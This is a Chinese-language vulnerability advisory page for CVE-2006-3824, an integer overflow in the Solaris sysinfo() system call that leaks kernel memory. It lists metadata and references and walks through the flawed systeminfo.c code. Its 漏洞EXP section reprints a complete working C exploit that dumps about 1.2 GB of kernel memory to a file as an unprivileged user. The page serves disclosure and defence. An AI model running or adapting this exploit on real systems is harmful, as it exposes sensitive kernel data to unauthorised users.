Sun sysinfo() Kernel内存信息泄露漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1110675 漏洞类型 缓冲区溢出
发布时间 2006-07-24 更新时间 2007-06-27
CVE编号 CVE-2006-3824 CNNVD-ID CNNVD-200607-411
漏洞平台 Solaris CVSS评分 4.9
|漏洞来源
https://www.exploit-db.com/exploits/2067
https://www.securityfocus.com/bid/19104
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200607-411
|漏洞详情
Solaris是一款由Sun开发和维护的商业性质UNIX操作系统。Solaris的/usr/src/uts/common/syscall/systeminfo.c文件中存在整数溢出漏洞,可能导致内核信息泄露。漏洞相关的代码如下:125if(kstr!=NULL){126if((strcnt=strlen(kstr))>=count){127getcnt=count-1;128if(subyte(buf+count-1,0)<0)129return(set_errno(EFAULT));130}else131getcnt=strcnt+1;132if(copyout(kstr,buf,getcnt))133return(set_errno(EFAULT));134return(strcnt+1);135}如果由用户提供的变量count为0的话,函数就会以-1长度参数调用copyout函数。由于copyout将长度参数解释为无符整数,因此就会将大量数据拷贝到用户空间,导致攻击者可以读取敏感的Kernel内存。
|漏洞EXP
/* Sun Microsystems Solaris sysinfo() Kernel Memory Disclosure exploit
 * ===================================================================
 * Local exploitation of an integer overflow vulnerability in Sun
 * Microsystems Inc. Solaris allows attackers to read kernel memory from a
 * non-privileged userspace process. The vulnerability specifically exists
 * due to an integer overflow in /usr/src/uts/common/syscall/systeminfo.c
 *
 * Example Use.
 * $ uname -a 
 * SunOS sunos 5.11 snv_30 sun4u sparc SUNW,Ultra-250
 * $ ./prdelka-vs-SUN-sysinfo kbuf
 * [ Solaris <= 10 sysinfo() kernel memory information leak
 * [ Wrote 1294967293 bytes to kbuf
 * $ ls -al kbuf
 * -rwx------   1 user     other       1.2G Jul 21 23:56 kbuf
 *
 * -prdelka
 */
#include <sys/systeminfo.h>
#include <sys/types.h>
#include <sys/stat.h>
#include <fcntl.h>

#define bufsize 1294967293

int main(int argc,char* argv[]){
        int fd;
 	ssize_t out;
        char* output_buffer;
	if(argc < 2){
		printf("[ Use with <filepath>\n");
		exit(1);
	}
        printf("[ Solaris <= 10 sysinfo() kernel memory information leak\n");
	output_buffer = malloc(bufsize);
        memset(output_buffer,0,bufsize);
        sysinfo(SI_SYSNAME,output_buffer,0);
        fd = open(argv[1],O_RDWR|O_CREAT,0700);
	if(fd!=-1){
	        out = write(fd,output_buffer,bufsize);
		printf("[ Wrote %u bytes to %s\n",out,argv[1]);
	        close(fd);
	}
        exit(0);
}

// milw0rm.com [2006-07-24]
|受影响的产品
Sun Solaris 10_x86 Sun Solaris 10 Avaya Interactive Response
|参考资料

来源:BID
名称:19104
链接:http://www.securityfocus.com/bid/19104
来源:MISC
链接:http://www.idefense.com/intelligence/vulnerabilities/display.php?id=410
来源:XF
名称:solaris-systeminfo-overflow(27901)
链接:http://xforce.iss.net/xforce/xfdb/27901
来源:BUGTRAQ
名称:20060724Re:Re:[Full-disclosure]iDefenseSecurityAdvisory07.20.06:SunMicrosystemsSolarissysinfo()KernelMemoryDisclosureVulnerability
链接:http://www.securityfocus.com/archive/1/archive/1/440986/100/100/threaded
来源:BUGTRAQ
名称:20060721Re:[Full-disclosure]iDefenseSecurityAdvisory07.20.06:SunMicrosystemsSolarissysinfo()KernelMemoryDisclosureVulnerability
链接:http://www.securityfocus.com/archive/1/archive/1/440849/100/100/threaded
来源:VUPEN
名称:ADV-2006-2936
链接:http://www.frsirt.com/english/advisories/2006/2936
来源:SECTRACK
名称:1016555
链接:http://securitytracker.com/id?1016555
来源:SECUNIA
名称:21148
链接:http://secunia.com/advisories/21148